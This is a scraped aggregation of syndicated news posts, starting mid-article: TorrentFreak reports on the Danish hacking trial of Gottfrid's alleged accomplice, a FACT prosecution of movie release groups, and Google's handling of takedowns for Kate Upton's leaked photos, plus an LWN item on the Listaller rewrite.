Discussion also returned to the IRC conversations referenced in the first week of the trial which reportedly took place between ‘My Evil Twin’ (allegedly Gottfrid) and ‘Advanced Persistent Terrorist Threat’ (allegedly the 21-year-old).

mysterMuch was made in week one of potentially altered Internet Relay Chat (IRC) logs presented by the prosecution. This week the Dane admitted that he had been involved in some conversations and had actually met ‘My Evil Twin’. That person was not Gottfrid, he said.

In respect of the content of some chats, the Dane said the topic had indeed centered around the security of IT systems but he insisted that there we no plans to hack CSC or any other companies’ computers. Usernames and passwords of CSC systems that were allegedly exchanged during the IRC chats had been found using Google, he added.

Also of note during the day’s proceedings was the Dane’s continued refusal to provide police with encryption keys to examine the contents of his laptop.

“There is no material on my computer. I can not see how it would make this a better situation,” he told the court.

However, DR.dk reported that during the day, due to the nature of the evidence being presented, it became clear that police had managed to retrieve some information without access to the keys.

appelbaumAfter a day’s break in proceedings, on Friday renowned activist and security expert Jacob Appelbaum appeared as an expert witness for the defense. Appelbaum also appeared in Gottfrid’s Swedish trial, a case in which he was partly acquitted.

The prosecution previously complained that Appelbaum knows Gottfrid personally, so was unsuitable as an expert witness. The American denied that was the case.

“I’ve only talked a little with Gottfrid as he is not known as a sociable guy. He is not easy to approach and the times that I’ve seen him in social situations it has always been about computer security,” Appelbaum said.

Echoing his testimony in the Swedish case, Appelbaum told the Court that it certainly would have been possible for outsiders to have controlled Gottfrid’s computer to carry out the hack of CSC.

It’s unclear for how long the trial will continue but hearings have been allocated until the end of October.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

TorrentFreak: Pirate Movie Group Members Set to Face FACT in Court

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

There’s a good case to argue that the UK’s Federation Against Copyright (FACT) Theft is the most aggressive anti-piracy group operating in the West today.

While the MPAA softens its approach and becomes friendly on its home turf, FACT – a unit funded by Hollywood – is acting as a proxy overseas in the United Kingdom.

Later this year FACT will take another private prosecution to a criminal court in the UK. According to a press release issued yesterday, five men will face charges that they coordinated to action the unauthorized online distribution of recently released films.

Other than noting that the men were arrested in 2013, FACT provided no other details and due to legal reasons declined further comment. However, TorrentFreak has been able to confirm the following.

Following an investigation into the “sourcing and supply” of pirated films on the Internet, February last year FACT and police from the economic crime unit targeted four addresses in the West Midlands.

Image from the raid

Raid

Four men, then aged 20, 22, 23 and 31, were arrested on suspicion of offenses committed under the Copyright Act, but exactly who they were was never made public.

However, TF discovered that the men were members of a pair of P2P movie release groups known as 26K and RemixHD, a former admin of UnleashTheNet (the site run by busted US-based release group IMAGiNE) and an individual from torrent site The Resistance.

The image below shows the final movie releases of RemixHD, the last taking place on January 29, 2013. The raids took place on February 1, 2013.

RemixHD

FACT now report that five men, one more than originally reported, will face charges at Wolverhampton Crown Court later this year. While men from the two release groups are set to appear, it is unclear whether the former torrent site admins are still in the frame, although it is possible that FACT are referring to them collectively as a release group.

Aside from the fact that this will be the first time that a release group case has ever gone to court in the UK, the case is notable in two other respects.

Firstly, FACT – not the police – are prosecuting the case. Second, nowhere does FACT mention that the five will face charges of copyright infringement – it appears that the main charge now is conspiracy to defraud.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

LWN.net: Klumpp: Listaller: Back to the future!

This post was syndicated from: LWN.net and was written by: n8willis. Original post: at LWN.net

At his blog, Matthias Klumpp provides an update on recent work in Listaller, the cross-distribution framework for third-party package installation. The core issue is that Listaller currently relies on PackageKit’s plugin infrastructure, which is going away. As a result, Klumpp has started work on a substantial rewrite of Listaller that will integrate with AppStream and other up-to-date tools. He is also, notably, taking this opportunity to trim down the project in other respects: “The new incarnation of Listaller will only support installations of statically linked software at the beginning. We will start with a very small, robust core, and then add more features (like dependency-solving) gradually, but only if they are useful. There will be no feature-creep like in the previous version.

TorrentFreak: Google Refuses to Remove Links to Kate Upton’s “Fappening” Photos

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

uptonNearly two weeks have passed since hundreds of photos of naked celebrities leaked online. This “fappening” triggered a massive takedown operation targeting sites that host and link to the images, Google included.

A few days ago Google received a request to remove links to Kate Upton’s stolen photos The request was not sent by Upton but by her boyfriend Jason Verlander, who also appears in a few of the leaked images.

The notice includes hundreds of URLs of sites such as thefappening.eu where the photos are hosted without permission.

It’s quite unusual for Google’s takedown team to be confronted with a long link of naked celebrity pictures. This may explain why it took a while before a decision was reached on the copyright-infringing status of the URLs, a process that may involve a cumbersome manual review.

Yesterday the first batch was processed and interestingly enough Google decided to leave nearly half of all URLs untouched. The overview below shows that with 16 of the 444 links processed, only 45% were removed.

The big question is, of course, why?

Verlander’s takedown request

upton-google-fappening

Google doesn’t explain its decision keep the links in question in its search results. In some cases the original content had already been removed at the source site, so these URLs didn’t have to be removed.

Other rejections are more mysterious though. For example, the thefappening.eu URLs that remain online all pointed to stolen images when we checked. Most of these were not nudes, but they certainly weren’t posted with permission.

One possible explanation for Google’s inaction is that Verlander most likely claimed to own the copyright on the images, something he can only do with pictures he took himself. With Upton’s selfies this is hard to do, unless she signed away her rights.

While browsing through the reported URLs we also noticed another trend. Some sites have replaced Upton’s leaked photos with photos of other random naked women. Google’s takedown team apparently has a sharp eye because these were not removed by Google either.

Chilling Effects, who host Google’s takedown requests, just posted a redacted version of the original notice with Upton’s name removed. Unfortunately this doesn’t offer more clues to resolve this takedown mystery, so for now we can only guess why many of the links remain indexed.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.